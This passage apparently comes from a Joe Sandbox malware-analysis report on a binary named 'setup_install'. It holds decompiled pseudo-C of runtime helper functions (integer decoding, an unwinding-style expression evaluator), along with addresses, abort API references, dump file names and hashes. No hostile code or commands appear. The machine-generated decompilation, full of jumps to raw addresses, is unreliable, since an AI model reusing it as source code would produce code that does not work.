						if ( *0x4e64dc != 4) goto 0x498c80;
						 *(_t138 + 0x1c) = _t133;
						if(( *(_t100 + 0x63) & 0x00000040) != 0) {
							 *((char*)(_t100 + 0x70)) = 0;
						}
						 *((intOrPtr*)(_t138 + 0xc0)) = 1;
						 *((intOrPtr*)(_t100 + 0x10)) = _t138 + 0x1c;
						 *((intOrPtr*)(_t138 + 0xb8)) = 4;
						 *((intOrPtr*)(_t138 + 0xb4)) = 0;
						_t89 = E0040E840(_t100, _t138 + 0x20);
						 *((intOrPtr*)(_t100 + 0x4c)) = _t130;
						return _t89;
					} else {
						_t90 =  *((intOrPtr*)(_t132 + 0x9c));
						_t131 = 0;
						_t108 = 0;
						do {
							_t90 = _t90 + 1;
							_t101 =  *(_t90 - 1) & 0x000000ff;
							_t118 = (_t101 & 0x0000007f) << _t108;
							_t108 = _t108 + 7;
							_t131 = _t131 | _t118;
						} while (_t101 < 0);
						 *_t136 = 0;
						 *((intOrPtr*)(_t136 + 0x1c)) = E0040E1C0(_t90, _t136 + 0x30, _t90 + _t131);
						goto L14;
					}
				} else {
					_t98 =  *(_t132 + 0x98);
					if (_t98 - 0x11 > 0) goto 0x498c7b;
					_t103 =  *(_t98 + 0x4e64d8) & 0x000000ff;
					_t110 =  *((intOrPtr*)(_t136 + 0x30 + _t98 * 4));
					if((_t113 & 0x40000000) == 0 ||  *((char*)(_t136 + _t98 + 0x9c)) == 0) {
						if (_t103 != 4) goto 0x498c7b;
						_t110 =  *_t110;
					}
					 *((intOrPtr*)(_t136 + 0x1c)) = _t110 +  *((intOrPtr*)(_t132 + 0x94));
					L14:
					_t102 = 0;
					 *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x18)) + 0x48)) =  *((intOrPtr*)(_t136 + 0x1c));
					while( *(_t132 + 4 + _t102 * 8) > 5) {
						_t102 = _t102 + 1;
						if(_t102 != 0x12) {
							continue;
						}
						_t120 =  *( *((intOrPtr*)(_t136 + 0x18)) + 0x60);
						_t96 = _t120 & 0x7fffffff;
						if( *((char*)(_t132 + 0xbb)) != 0) {
							_t96 = _t120 | 0x80000000;
						}
						 *( *((intOrPtr*)(_t136 + 0x18)) + 0x60) = _t96;
						return _t96;
						goto L31;
					}
					goto ( *((intOrPtr*)(0x4a4fe0 +  *(_t132 + 4 + _t102 * 8) * 4)));
				}
				L31:
			}

0x0040e846
0x0040e84a
0x0040e84d
0x0040e857
0x0040e85b
0x0040e85b
0x0040e85b
0x0040e85d
0x0040e86a
0x0040e87c
0x0040eae9
0x0040eaef
0x0040eaf9
0x0040eafb
0x0040eafb
0x0040eb07
0x0040eb07
0x0040e87c
0x0040e882
0x0040e88a
0x0040e88c
0x0040e88c
0x0040e894
0x0040e89b
0x0040e8a4
0x0040e8f3
0x0040eb10
0x0040eb20
0x0040eb21
0x0040eb23
0x0040eb24
0x0040eb25
0x0040eb2d
0x0040eb39
0x0040eb39
0x0040eb3b
0x0040eb4d
0x0040eb52
0x0040eb59
0x0040eb5f
0x0040eb67
0x0040eb6e
0x0040eb75
0x0040ebda
0x0040ebdc
0x0040ebe3
0x0040ebea
0x0040ebf1
0x0040ebf8
0x0040ebff
0x0040ec06
0x0040ec0d
0x0040ec14
0x0040ec1b
0x0040ec22
0x0040ec29
0x0040ec30
0x0040ec37
0x0040ec3e
0x0040ec45
0x0040ec45
0x0040ebda
0x0040eb7e
0x0040eb84
0x0040eb8c
0x0040eb8e
0x0040eb8e
0x0040eb9a
0x0040eba5
0x0040ebaa
0x0040ebb5
0x0040ebc0
0x0040ebc5
0x0040ebd2
0x0040e8f9
0x0040e8f9
0x0040e8ff
0x0040e901
0x0040e903
0x0040e903
0x0040e906
0x0040e90f
0x0040e911
0x0040e914
0x0040e916
0x0040e91a
0x0040e92d
0x00000000
0x0040e92d
0x0040e8a6
0x0040e8a6
0x0040e8af
0x0040e8bb
0x0040e8c2
0x0040e8c6
0x0040e8d5
0x0040e8db
0x0040e8db
0x0040e8e3
0x0040e931
0x0040e939
0x0040e93b
0x0040e940
0x0040e973
0x0040e979
0x00000000
0x00000000
0x0040e97f
0x0040e984
0x0040e990
0x0040e994
0x0040e994
0x0040e99d
0x0040e9aa
0x00000000
0x0040e9aa
0x0040e94b
0x0040e94b
0x00000000

Strings

@, xrefs: 0040EAC4
|iI, xrefs: 0040E849

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID:
String ID: @$|iI
API String ID: 0-1465200595
Opcode ID: 798c8514562320cf3ba82381b2c9a34e3ea00c10bd4febef13b78ded6fc52f2e
Instruction ID: 44b16e076c92e0f9b3a8f1e1029124af9e42a2b2b70f7fe522f22f73e0f16111
Opcode Fuzzy Hash: 798c8514562320cf3ba82381b2c9a34e3ea00c10bd4febef13b78ded6fc52f2e
Instruction Fuzzy Hash: 6DA1D2B19083458FD720DF29C08475BBBE0BB85358F044C7EE9C59B392C779A859CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040EAAC, Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 34
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040EAAC(void* __eax, signed int __ebx) {
				signed int _t42;
				signed int _t44;
				signed int _t46;
				intOrPtr _t49;
				void* _t51;
				void* _t53;

				_t44 = __ebx;
				if (__eax - 0x11 > 0) goto 0x498c7b;
				__eax =  *(__esp + 0x30 + __eax * 4);
				if(( *(__esp + 0x93) & 0x00000040) == 0) {
					if (__dl != 4) goto 0x498c7b;
					__eax =  *__eax;
				}
				if( *((char*)(__ebx + 0x4e64d8)) <= 4) {
					_t49 =  *((intOrPtr*)(_t53 + 0x18));
					 *((char*)(_t49 + _t44 + 0x6c)) = 1;
					 *(_t49 + _t44 * 4) = _t39;
				} else {
					goto 0x498c7b;
					__esi =  *((intOrPtr*)(__esp + 0x18));
					__eax =  *(__esp + 0x1c);
					__eax =  *(__esp + 0x1c) +  *((intOrPtr*)(__ebp + __ebx * 8));
					if(( *(__esi + 0x63) & 0x00000040) != 0) {
						 *((char*)(__esi + __ebx + 0x6c)) = 0;
					}
					 *( *((intOrPtr*)(__esp + 0x18)) + __ebx * 4) = __eax;
					while(1) {
						L4:
						_t44 = _t44 + 1;
						if(_t44 == 0x12) {
							break;
						}
						if( *(_t51 + 4 + _t44 * 8) <= 5) {
							_t39 =  *(_t51 + 4 + _t44 * 8);
							goto ( *((intOrPtr*)(0x4a4fe0 +  *(_t51 + 4 + _t44 * 8) * 4)));
						}
					}
					_t46 =  *( *((intOrPtr*)(_t53 + 0x18)) + 0x60);
					_t42 = _t46 & 0x7fffffff;
					if( *((char*)(_t51 + 0xbb)) != 0) {
						_t42 = _t46 | 0x80000000;
					}
					 *( *((intOrPtr*)(_t53 + 0x18)) + 0x60) = _t42;
					return _t42;
				}
				goto L4;
			}

0x0040eaac
0x0040eab3
0x0040eac0
0x0040eacc
0x0040ead1
0x0040ead7
0x0040ead7
0x0040ea83
0x0040e967
0x0040e96b
0x0040e970
0x0040ea89
0x0040ea89
0x0040ea90
0x0040ea94
0x0040ea98
0x0040eaa0
0x0040e9f6
0x0040e9f6
0x0040e9ff
0x0040e973
0x0040e973
0x0040e973
0x0040e979
0x00000000
0x00000000
0x0040e945
0x0040e947
0x0040e94b
0x0040e94b
0x0040e945
0x0040e97f
0x0040e984
0x0040e990
0x0040e994
0x0040e994
0x0040e99d
0x0040e9aa
0x0040e9aa
0x00000000

APIs

abort.MSVCRT ref: 00498C7B
abort.MSVCRT ref: 00498C80
abort.MSVCRT(0040F34B), ref: 00498C85
abort.MSVCRT(0040F34B), ref: 00498C8A
abort.MSVCRT(0040F34B), ref: 00498C8F
abort.MSVCRT(0040F34B), ref: 00498C94
abort.MSVCRT(0040F34B), ref: 00498C99
abort.MSVCRT(0040F34B), ref: 00498C9E
abort.MSVCRT(0040F34B), ref: 00498CA3
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CA8
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CB0
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CB5

Strings

@, xrefs: 0040EAC4

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: abort
String ID: @
API String ID: 4206212132-2766056989
Opcode ID: 13e698e59d0f249dd2875b3a1873e6024dbaf5104afd5f71196e65c8dd9fbcef
Instruction ID: ad0ca6e584965c47c01576eb5f8f5867583991b016173ca9c9fa89ceeb956038
Opcode Fuzzy Hash: 13e698e59d0f249dd2875b3a1873e6024dbaf5104afd5f71196e65c8dd9fbcef
Instruction Fuzzy Hash: 9EE0D1B0E0915459DB10DF158084379B6A17B47358F54145FE585371E3C73C8451C55F

Uniqueness

Uniqueness Score: -1.00%

Function 0040D1C0, Relevance: 22.6, APIs: 15, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D1C0(signed int __eax, void* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				intOrPtr _v32;
				signed char _t14;
				signed int _t18;

				_v32 = __edx;
				if(__eax != 0x50) {
					_t14 = __eax & 0x0000000f;
					if (_t14 - 0xc > 0) goto 0x498c6c;
					goto ( *((intOrPtr*)(0x4a4adc + (_t14 & 0x000000ff) * 4)));
				}
				_t18 = __ecx + 0x00000003 & 0xfffffffc;
				 *_a4 =  *_t18;
				return _t18 + 4;
			}

0x0040d1c9
0x0040d1cf
0x0040d1d3
0x0040d1d9
0x0040d1e2
0x0040d1e2
0x0040d227
0x0040d22f
0x0040d23a

APIs

abort.MSVCRT ref: 00498C6C
abort.MSVCRT ref: 00498C71
abort.MSVCRT ref: 00498C76
abort.MSVCRT ref: 00498C7B
abort.MSVCRT ref: 00498C80
abort.MSVCRT(0040F34B), ref: 00498C85
abort.MSVCRT(0040F34B), ref: 00498C8A
abort.MSVCRT(0040F34B), ref: 00498C8F
abort.MSVCRT(0040F34B), ref: 00498C94
abort.MSVCRT(0040F34B), ref: 00498C99
abort.MSVCRT(0040F34B), ref: 00498C9E
abort.MSVCRT(0040F34B), ref: 00498CA3
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CA8
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CB0
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CB5

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 6d33ed5c32fe55a0c19b40cd2525423c789506189f4bf758b5f2fdcc931bf298
Instruction ID: ca73084cad19c07058bd28c2fc4a43f3da3cd2e8cf3709dd5c36d96521b3bfd1
Opcode Fuzzy Hash: 6d33ed5c32fe55a0c19b40cd2525423c789506189f4bf758b5f2fdcc931bf298
Instruction Fuzzy Hash: 0E214232B052148FD704CF98D8C16A1B3A6FBC2318F1881BFE9485F355C279A80997A9

Uniqueness

Uniqueness Score: -1.00%

Function 0040D340, Relevance: 21.3, APIs: 14, Instructions: 335
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0040D340(signed int __eax, intOrPtr __ecx, intOrPtr __edx, signed int _a4) {
				void* _v16;
				signed int _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				signed int _t36;
				unsigned int _t37;
				signed int _t41;
				unsigned int _t42;
				signed char* _t45;
				signed int _t46;
				signed int _t47;
				signed int _t51;
				signed char _t52;
				intOrPtr _t54;
				signed int _t57;
				signed int _t58;
				signed int _t59;
				signed int _t60;
				intOrPtr _t61;
				signed int _t62;
				signed int _t63;
				signed char* _t64;
				signed char* _t66;

				_t36 = __eax;
				_t64 = __eax;
				_t59 = _a4;
				_v52 = __edx;
				_v56 = __ecx;
				 *((intOrPtr*)(_t59 + 0x90)) = 0;
				if(__eax >= __edx) {
					L10:
					return _t36;
				}
				_t37 =  *(__ecx + 0x60);
				_t54 =  *((intOrPtr*)(_t59 + 0xa4));
				_v48 = _t37;
				_t36 = (_t37 >> 0x1f) +  *((intOrPtr*)(__ecx + 0x4c));
				if(_t54 < _t36) {
					_v60 = 0;
					do {
						_t36 =  *_t64 & 0x000000ff;
						_t10 =  &(_t64[1]); // 0x1
						_t45 = _t10;
						_t51 = _t36 & 0xffffffc0;
						if(_t51 == 0x40) {
							_t60 = _a4;
							_t64 = _t45;
							_t36 = (_t36 & 0x0000003f) *  *(_t60 + 0xb0) + _t54;
							 *(_t60 + 0xa4) = _t36;
							L8:
							if(_v52 <= _t64) {
								goto L10;
							}
							goto L9;
						}
						if(_t51 == 0x80) {
							_t36 = _t36 & 0x0000003f;
							_t62 = 0;
							_t52 = 0;
							_v48 = _t36 & 0x000000ff;
							_t66 = _t45;
							do {
								_t66 =  &(_t66[1]);
								_t46 =  *(_t66 - 1) & 0x000000ff;
								_t57 = (_t46 & 0x0000007f) << _t52;
								_t52 = _t52 + 7;
								_t62 = _t62 | _t57;
							} while (_t46 < 0);
							_t47 = _a4;
							_t63 = _t62 *  *(_t47 + 0xac);
							if(_t36 <= 0x11) {
								_t36 = _t47 + _v48 * 8;
								 *((intOrPtr*)(_t36 + 4)) = 1;
								 *_t36 = _t63;
							}
							goto L8;
						}
						if(_t51 == 0xc0) {
							_t36 = _t36 & 0x0000003f;
							_t58 = _t36 & 0x000000ff;
							if(_t36 > 0x11) {
								_t64 = _t45;
							} else {
								_t36 = _a4;
								_t64 = _t45;
								 *((intOrPtr*)(_t36 + 4 + _t58 * 8)) = 0;
							}
							goto L8;
						}
						if (_t36 - 0x2f > 0) goto 0x498c71;
						goto ( *((intOrPtr*)(0x4a4b10 + _t36 * 4)));
						L9:
						_t41 = _a4;
						_t61 = _v56;
						_t16 = _t41 + 0xa4; // 0x5bd0891c
						_t54 =  *_t16;
						_t42 =  *(_t61 + 0x60);
						_v48 = _t42;
						_t36 = (_t42 >> 0x1f) +  *((intOrPtr*)(_t61 + 0x4c));
					} while (_t54 < _t36);
				}
			}

0x0040d340
0x0040d345
0x0040d34b
0x0040d34e
0x0040d351
0x0040d354
0x0040d360
0x0040d3d3
0x0040d3da
0x0040d3da
0x0040d362
0x0040d365
0x0040d36b
0x0040d371
0x0040d376
0x0040d378
0x0040d380
0x0040d380
0x0040d383
0x0040d383
0x0040d388
0x0040d38e
0x0040d3e0
0x0040d3e6
0x0040d3ef
0x0040d3f1
0x0040d3b2
0x0040d3b5
0x00000000
0x00000000
0x00000000
0x0040d3b5
0x0040d393
0x0040d420
0x0040d423
0x0040d425
0x0040d42a
0x0040d42d
0x0040d430
0x0040d430
0x0040d433
0x0040d43c
0x0040d43e
0x0040d441
0x0040d443
0x0040d447
0x0040d44a
0x0040d453
0x0040d45e
0x0040d461
0x0040d468
0x0040d468
0x00000000
0x0040d453
0x0040d39c
0x0040d400
0x0040d403
0x0040d408
0x0040d3b0
0x0040d40a
0x0040d40a
0x0040d40d
0x0040d40f
0x0040d40f
0x00000000
0x0040d408
0x0040d3a0
0x0040d3a6
0x0040d3b7
0x0040d3b7
0x0040d3ba
0x0040d3bd
0x0040d3bd
0x0040d3c3
0x0040d3c6
0x0040d3cc
0x0040d3cf
0x0040d380

APIs

abort.MSVCRT ref: 00498C71
abort.MSVCRT ref: 00498C76
abort.MSVCRT ref: 00498C7B
abort.MSVCRT ref: 00498C80
abort.MSVCRT(0040F34B), ref: 00498C85
abort.MSVCRT(0040F34B), ref: 00498C8A
abort.MSVCRT(0040F34B), ref: 00498C8F
abort.MSVCRT(0040F34B), ref: 00498C94
abort.MSVCRT(0040F34B), ref: 00498C99
abort.MSVCRT(0040F34B), ref: 00498C9E
abort.MSVCRT(0040F34B), ref: 00498CA3
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CA8
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CB0
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CB5

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 09472085ec4d271cec4e0af75768eb1330f9549b7f789a309c219d524e72bf9a
Instruction ID: 08e1cd8f894d7995bc2050aec15bde84e9a69aed272b79bbdd43bf917931a081
Opcode Fuzzy Hash: 09472085ec4d271cec4e0af75768eb1330f9549b7f789a309c219d524e72bf9a
Instruction Fuzzy Hash: 7DB11976E046249FC7048F68C48179ABBE1BF45354F09827AEC59EB382C33DE9499BC5

Uniqueness

Uniqueness Score: -1.00%

Function 0040E670, Relevance: 21.1, APIs: 14, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E670(signed char* __ebx, void* __edx) {
				signed int _t25;
				signed int _t27;
				signed int _t30;
				intOrPtr _t31;
				signed char* _t32;
				signed char _t35;
				signed int _t38;
				signed int _t39;
				signed char* _t42;
				signed int _t44;
				void* _t46;

				_t32 = __ebx;
				_t25 =  *(_t46 + 0x14);
				if (_t25 - 1 <= 0) goto 0x498c76;
				_t44 = _t25 - 2;
				_t38 = __edx - 0x1a;
				_t39 =  *(_t46 + 0x30 + _t44 * 4);
				if(_t38 > 0x14) {
					goto L8;
				} else {
					__edx = __dl & 0x000000ff;
					goto ( *((intOrPtr*)(0x4a4f8c + (__dl & 0x000000ff) * 4)));
				}
				do {
					do {
						goto L8;
						L11:
					} while (_t38 != 0x19);
					_t42 = _t32;
					_t39 = (_t39 ^ _t39 >> 0x0000001f) - (_t39 >> 0x1f);
					L3:
					if (_t44 - 0x3f > 0) goto 0x498c76;
					 *(_t46 + 0x30 + _t44 * 4) = _t39;
					 *(_t46 + 0x14) = _t44 + 1;
					if( *((intOrPtr*)(_t46 + 0x18)) > _t42) {
						goto L1;
					}
					_t30 =  *(_t46 + 0x14);
					if (_t30 == 0) goto 0x498c76;
					_t31 =  *((intOrPtr*)(_t46 + 0x2c + _t30 * 4));
					return _t31;
					L13:
					L1:
					_t27 =  *_t42 & 0x000000ff;
					_t9 =  &(_t42[1]); // 0x1
					_t32 = _t9;
					_t35 = _t27 - 3;
					_t38 = _t27;
				} while (_t35 > 0xee);
				goto ( *((intOrPtr*)(0x4a4bd0 + (_t35 & 0x000000ff) * 4)));
				L8:
				abort();
				if(_t38 != 6) {
					goto L11;
				} else {
					_t39 =  *_t39;
					_t42 = _t32;
					goto L3;
				}
				goto L13;
			}

0x0040e670
0x0040e670
0x0040e677
0x0040e67d
0x0040e680
0x0040e687
0x0040e68e
0x00000000
0x0040e690
0x0040e690
0x0040e693
0x0040e693
0x0040e6b9
0x0040e6b9
0x00000000
0x0040e6d0
0x0040e6d0
0x0040e6d7
0x0040e6de
0x0040e220
0x0040e223
0x0040e22c
0x0040e230
0x0040e238
0x00000000
0x00000000
0x0040e23a
0x0040e240
0x0040e246
0x0040e254
0x00000000
0x0040e1f0
0x0040e1f0
0x0040e1f3
0x0040e1f3
0x0040e1f6
0x0040e1f9
0x0040e1fb
0x0040e207
0x0040e6b9
0x0040e6b9
0x0040e6c3
0x00000000
0x0040e6c5
0x0040e6c5
0x0040e6c7
0x00000000
0x0040e6c7
0x00000000

APIs

abort.MSVCRT ref: 0040E6B9
abort.MSVCRT ref: 00498C76
abort.MSVCRT ref: 00498C7B
abort.MSVCRT ref: 00498C80
abort.MSVCRT(0040F34B), ref: 00498C85
abort.MSVCRT(0040F34B), ref: 00498C8A
abort.MSVCRT(0040F34B), ref: 00498C8F
abort.MSVCRT(0040F34B), ref: 00498C94
abort.MSVCRT(0040F34B), ref: 00498C99
abort.MSVCRT(0040F34B), ref: 00498C9E
abort.MSVCRT(0040F34B), ref: 00498CA3
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CA8
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CB0
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CB5

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 2795157926b81a587e86aba560741228b3f75b8a8716589258aafa41c9bd12c2
Instruction ID: 8fda6f030b58cc8965d4730c51b9de52554c5b8ba726e6091de546853a937206
Opcode Fuzzy Hash: 2795157926b81a587e86aba560741228b3f75b8a8716589258aafa41c9bd12c2
Instruction Fuzzy Hash: F831B433A09011AFC3545D2A748156961CB53C83B4F2F1EBFE406F3382D97EAC62918E

Uniqueness

Uniqueness Score: -1.00%

Function 0040E2A0, Relevance: 21.1, APIs: 14, Instructions: 100
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E2A0(void* __edx, signed char* __esi) {
				signed int _t22;
				signed int _t24;
				signed int _t27;
				intOrPtr _t28;
				signed char* _t29;
				signed char* _t30;
				signed char _t32;
				signed int _t35;
				signed int _t36;
				signed char* _t39;
				signed int _t42;
				void* _t44;

				_t39 = __esi;
				_t22 =  *(_t44 + 0x14);
				if (_t22 == 0) goto 0x498c76;
				_t42 = _t22 - 1;
				_t36 =  *(_t44 + 0x30 + _t42 * 4);
				if(__edx == 0x1f) {
					_t36 =  ~_t36;
					_t39 = _t29;
				} else {
					if(__eflags <= 0) {
						L17:
						__eflags = _t35 - 6;
						if(_t35 != 6) {
							__eflags = _t35 - 0x19;
							if(_t35 != 0x19) {
								goto L16;
							} else {
								_t39 = _t30;
								_t36 = (_t36 ^ _t36 >> 0x0000001f) - (_t36 >> 0x1f);
								goto L3;
							}
						} else {
							_t36 =  *_t36;
							_t39 = _t30;
							goto L3;
						}
					} else {
						__eflags = __dl - 0x23;
						if(__dl == 0x23) {
							__esi = 0;
							__ecx = 0;
							__eflags = 0;
							do {
								__ebx = __ebx + 1;
								__edx =  *(__ebx - 1) & 0x000000ff;
								__ecx = __ecx + 7;
								__esi = __esi | ( *(__ebx - 1) & 0x7f) << __cl;
								__eflags = __dl;
							} while (__dl < 0);
							__edi = __edi + __esi;
							__esi = __ebx;
							goto L3;
						} else {
							__eflags = __dl - 0x94;
							if(__dl != 0x94) {
								__eflags = __dl - 0x20;
								if(__dl == 0x20) {
									__edi =  !__edi;
									__esi = __ebx;
									goto L3;
								} else {
									goto L16;
								}
							} else {
								__edx = __esi + 2;
								__eflags = __al - 2;
								if(__eflags == 0) {
									__edi =  *__edi & 0x0000ffff;
									__esi = __edx;
									goto L3;
								} else {
									if(__eflags <= 0) {
										__eflags = __al - 1;
										if(__al != 1) {
											goto L16;
										} else {
											__edi =  *__edi & 0x000000ff;
											__esi = __edx;
											goto L3;
										}
									} else {
										__eflags = __al - 4;
										if(__al == 4) {
											L14:
											__edi =  *__edi;
											__esi = __edx;
											goto L3;
										} else {
											__eflags = __al - 8;
											if(__al != 8) {
												L16:
												abort();
												goto L17;
											} else {
												goto L14;
											}
										}
									}
								}
							}
						}
					}
					L29:
				}
				L3:
				if (_t42 - 0x3f > 0) goto 0x498c76;
				 *(_t44 + 0x30 + _t42 * 4) = _t36;
				 *(_t44 + 0x14) = _t42 + 1;
				if( *((intOrPtr*)(_t44 + 0x18)) > _t39) {
					_t24 =  *_t39 & 0x000000ff;
					_t5 =  &(_t39[1]); // 0x1
					_t30 = _t5;
					_t32 = _t24 - 3;
					_t35 = _t24;
					if(_t32 <= 0xee) {
						goto ( *((intOrPtr*)(0x4a4bd0 + (_t32 & 0x000000ff) * 4)));
					}
					goto L16;
				}
				_t27 =  *(_t44 + 0x14);
				if (_t27 == 0) goto 0x498c76;
				_t28 =  *((intOrPtr*)(_t44 + 0x2c + _t27 * 4));
				return _t28;
				goto L29;
			}

0x0040e2a0
0x0040e2a0
0x0040e2a6
0x0040e2ae
0x0040e2b1
0x0040e2b8
0x0040e759
0x0040e75b
0x0040e2be
0x0040e2be
0x0040e6c0
0x0040e6c0
0x0040e6c3
0x0040e6d0
0x0040e6d3
0x00000000
0x0040e6d5
0x0040e6d7
0x0040e6de
0x00000000
0x0040e6de
0x0040e6c5
0x0040e6c5
0x0040e6c7
0x00000000
0x0040e6c7
0x0040e2c4
0x0040e2c4
0x0040e2c7
0x0040e6f0
0x0040e6f2
0x0040e6f2
0x0040e6f4
0x0040e6f4
0x0040e6f7
0x0040e702
0x0040e705
0x0040e707
0x0040e707
0x0040e70b
0x0040e70d
0x00000000
0x0040e2cd
0x0040e2cd
0x0040e2d0
0x0040e6b0
0x0040e6b3
0x0040e750
0x0040e752
0x00000000
0x00000000
0x00000000
0x00000000
0x0040e2d6
0x0040e2da
0x0040e2dd
0x0040e2df
0x0040e831
0x0040e834
0x00000000
0x0040e2e5
0x0040e2e5
0x0040e734
0x0040e736
0x00000000
0x0040e73c
0x0040e73c
0x0040e73f
0x00000000
0x0040e73f
0x0040e2eb
0x0040e2eb
0x0040e2ed
0x0040e2f7
0x0040e2f7
0x0040e2f9
0x00000000
0x0040e2ef
0x0040e2ef
0x0040e2f1
0x0040e6b9
0x0040e6b9
0x00000000
0x00000000
0x00000000
0x00000000
0x0040e2f1
0x0040e2ed
0x0040e2e5
0x0040e2df
0x0040e2d0
0x0040e2c7
0x00000000
0x0040e2be
0x0040e220
0x0040e223
0x0040e22c
0x0040e230
0x0040e238
0x0040e1f0
0x0040e1f3
0x0040e1f3
0x0040e1f6
0x0040e1f9
0x0040e1fe
0x0040e207
0x0040e207
0x00000000
0x0040e1fe
0x0040e23a
0x0040e240
0x0040e246
0x0040e254
0x00000000

APIs

abort.MSVCRT ref: 0040E6B9
abort.MSVCRT ref: 00498C76
abort.MSVCRT ref: 00498C7B
abort.MSVCRT ref: 00498C80
abort.MSVCRT(0040F34B), ref: 00498C85
abort.MSVCRT(0040F34B), ref: 00498C8A
